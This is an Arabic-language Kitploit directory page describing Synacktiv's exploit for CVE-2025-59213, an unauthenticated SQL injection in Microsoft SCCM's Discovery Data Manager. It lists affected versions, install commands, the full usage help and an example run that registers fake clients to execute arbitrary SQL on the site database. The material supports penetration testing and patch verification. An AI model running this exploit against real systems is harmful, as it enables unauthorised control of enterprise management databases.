Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59213 — استغلال حقن SQL غير مصادق عليه لإصدار Microsoft Configuration Manager (SCCM) 2503، مما يتيح تنفيذ SQL عشوائي على قاعدة بيانات الموقع عبر طريقة Discovery Data Manager DDM. | Kitploit
أدوات/GitHubGitHub/synacktiv/cve-2025-59213
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubsynacktiv/cve-2025-59213

CVE-2025-59213

استغلال حقن SQL غير مصادق عليه لإصدار Microsoft Configuration Manager (SCCM) 2503، مما يتيح تنفيذ SQL عشوائي على قاعدة بيانات الموقع عبر طريقة Discovery Data Manager DDM.

عرض المستودع
3منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة حقن SQL غير مصادق عليها في Microsoft Configuration Manager (ConfigMgr / SCCM) 2503 (CVE-2025-59213) - استغلال

يستغل هذا السكريبت الثغرة CVE-2025-59213، والتي تسمح لمهاجم غير مصادق مع وصول شبكي إلى نقطة إدارة (Management Point) بتنفيذ استعلامات SQL عشوائية على قاعدة بيانات الموقع عن طريق إساءة استخدام ثغرة حقن SQL في طريقة DuplicateAMTMachineRecord الخاصة بـ Discovery Data Manager (DDM)، حيث يتم التعامل مع الحقل Hardware_ID0 غير المُفلتر بشكل غير صحيح أثناء دمج عميلين مع معرفات أجهزة متعارضة.

عندما يكون KB34503790 مفقودًا، تكون جميع الإصدارات التالية من Microsoft Configuration Manager عرضة للخطر:

  • < 2503 (5.00.9135.1008)
  • < 2409 (5.00.9132.1029)
  • < 2403 (5.00.9128.1035)
  • <= 2303 (*)

المتطلبات

  • في بعض الحالات، عندما تكون نقطة الإدارة مهيأة بوضع الاتصال HTTPS Only، يلزم وجود شهادة PKI لإجراء مصادقة TLS المتبادلة ضد خدمة HTTP الضعيفة. أي شهادة صادرة عن PKI الداخلي مع غرض Client Authentication ستكون صالحة.
  • إذا لم يكن لديك شهادة، استخدم المفتاح --altauth (مزيد من المعلومات هنا)

ملاحظات

  • يتطلب الاستغلال تسجيل عميلين مزيفين، يقوم السكريبت بحذفهما تلقائيًا عند نجاح حقن SQL ما لم يتم استخدام المفتاح --no-clean أو يمنع التصحيح عملية التنظيف.
  • نظرًا لأن الحقن غير متزامن، فإن الحمولات القائمة على الوقت غير فعالة حيث لا يوجد ارتباط مباشر بين التنفيذ وزمن الاستجابة.

التثبيت

يمكنك التثبيت عن طريق استنساخ المستودع وتثبيت التبعيات.

root@kitploit:~
$ git clone https://github.com/synacktiv/CVE-2025-59213
$ cd CVE-2025-59213
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt

الاستخدام

root@kitploit:~
 $ python3 CVE-2025-59213.py -h 
usage: CVE-2025-59213.py [-h] -t TARGET [-sk SIGKEY] [-k KEY] [-c CERT] [-v] -cn CLIENT_NAME [-rs REGISTRATION_SLEEP] [-a] -sql SQL [-nc]

CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection

options:
  -h, --help            show this help message and exit
  -t, --target TARGET   Target (http://sccm-mp.local/)
  -sk, --sigkey SIGKEY  SMS signature key (automatically generated if omitted)
  -k, --key KEY         Private key file for mTLS
  -c, --cert CERT       Certificate file for mTLS
  -v, --verbose         Verbose output, print requests
  -cn, --client-name CLIENT_NAME
                        Name of the client that will be created in SCCM
  -rs, --registration-sleep REGISTRATION_SLEEP
                        The amount of time, in seconds, that should be waited after registrating a new device (10 seconds by default)
  -a, --altauth         Use the MP's alternate authentication endpoint
  -sql SQL              Query to execute through the SQL injection
  -nc, --no-clean       Do not automatically clean the registred devices

مثال

root@kitploit:~
$ python3 ./CVE-2025-59213.py -t https://cmc.corp.local --altauth -cn FAKE_CLIENT_NAME -sql 'select 1'
[+] Generated new signing key, saved to /tmp/sccm_poc.key
[+] CcmMessage : ID={D731ED0A-4474-497D-A191-D8948E17ECBF}
[+] Got SMSID = GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F for new client FAKE_CLIENT_NAME
[+] CcmMessage : ID={23EEE9B8-7971-4560-9D18-9328C5DF0C2E}
[+] Got SMSID = GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69 for new client FAKE_CLIENT_NAME
[+] Sending DDR report: SMSID=GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F OLDSMSID=GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69
[+] CcmMessage : ID={88B6BEBD-1F99-4BD2-8786-6BD3C6CFF299}
[+] CcmMessage : adding clientauth
[+] CcmMessage : adding attachment
[+] DDR report sent successfully
تنزيل الأداة